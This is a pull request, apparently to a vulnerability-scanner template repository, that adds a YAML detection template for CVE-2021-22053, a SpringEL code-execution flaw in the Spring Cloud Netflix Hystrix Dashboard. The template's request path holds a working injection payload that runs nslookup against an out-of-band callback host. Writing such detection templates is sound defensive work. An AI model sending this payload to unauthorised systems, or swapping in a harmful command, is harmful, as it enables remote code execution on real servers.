### PR TITLE
feat: CVE-2021-22053

### DIFF
--- a/cves/2021/CVE-2021-22053.yaml
+++ b/cves/2021/CVE-2021-22053.yaml
@@ -22,7 +22,11 @@ requests:
     path:
       - '{{BaseURL}}/hystrix/;a=a/__${T (java.lang.Runtime).getRuntime().exec("nslookup {{interactsh-url}}")}__::.x/'
 
+    matchers-condition: and
     matchers:
+      - type: status
+        status:
+          - 500
       - type: word
         part: interactsh_protocol
         words:

--- a/cves/2021/CVE-2021-22053.yaml
+++ b/cves/2021/CVE-2021-22053.yaml
@@ -1,0 +1,29 @@
+id: CVE-2021-22053
+
+info:
+  name: RCE through SpringEL expressions in Spring Cloud Netflix Hystrix Dashboard < 2.2.10.RELEASE
+  author: forgedhallpass
+  severity: high
+  description: |
+    Applications using both `spring-cloud-netflix-hystrix-dashboard` and `spring-boot-starter-thymeleaf` expose a way to execute code submitted within the request URI path during the resolution of view templates.
+    When a request is made at `/hystrix/monitor;[user-provided data]`, the path elements following `hystrix/monitor` are being evaluated as SpringEL expressions, which can lead to code execution.
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-22053
+    - https://github.com/SecCoder-Security-Lab/spring-cloud-netflix-hystrix-dashboard-cve-2021-22053
+    - https://tanzu.vmware.com/security/cve-2021-22053
+  tags: rce,spring,cve,cve2021
+  classification:
+    cvss-score: 8.8
+    cve-id: CVE-2021-22053
+    cwe-id: CWE-94
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/hystrix/;a=a/__${T (java.lang.Runtime).getRuntime().exec("nslookup -a {{interactsh-url}}")}__::.x/'
+
+    matchers:
+      - type: word
+        part: interactsh_protocol
+        words:
+          - "dns"

--- a/cves/2021/CVE-2021-22053.yaml
+++ b/cves/2021/CVE-2021-22053.yaml
@@ -20,7 +20,7 @@ info:
 requests:
   - method: GET
     path:
-      - '{{BaseURL}}/hystrix/;a=a/__${T (java.lang.Runtime).getRuntime().exec("nslookup -a {{interactsh-url}}")}__::.x/'
+      - '{{BaseURL}}/hystrix/;a=a/__${T (java.lang.Runtime).getRuntime().exec("nslookup {{interactsh-url}}")}__::.x/'
 
     matchers:
       - type: word


### PR DESCRIPTION
RCE through SpringEL expressions in Spring Cloud Netflix Hystrix Dashboard < 2.2.10.RELEASE

### Template / PR Information

Added CVE-2021-22053

### Template Validation

I've validated this template locally?
- [x] YES
- [ ] NO

Template execution log:
![image](https://user-images.githubusercontent.com/13679401/143866046-68193d84-8693-4667-8d3e-ee16c26b3306.png)

Server logs:
![image](https://user-images.githubusercontent.com/13679401/143866187-2c629f23-4cc9-4c59-aa31-e36499dc07c3.png)
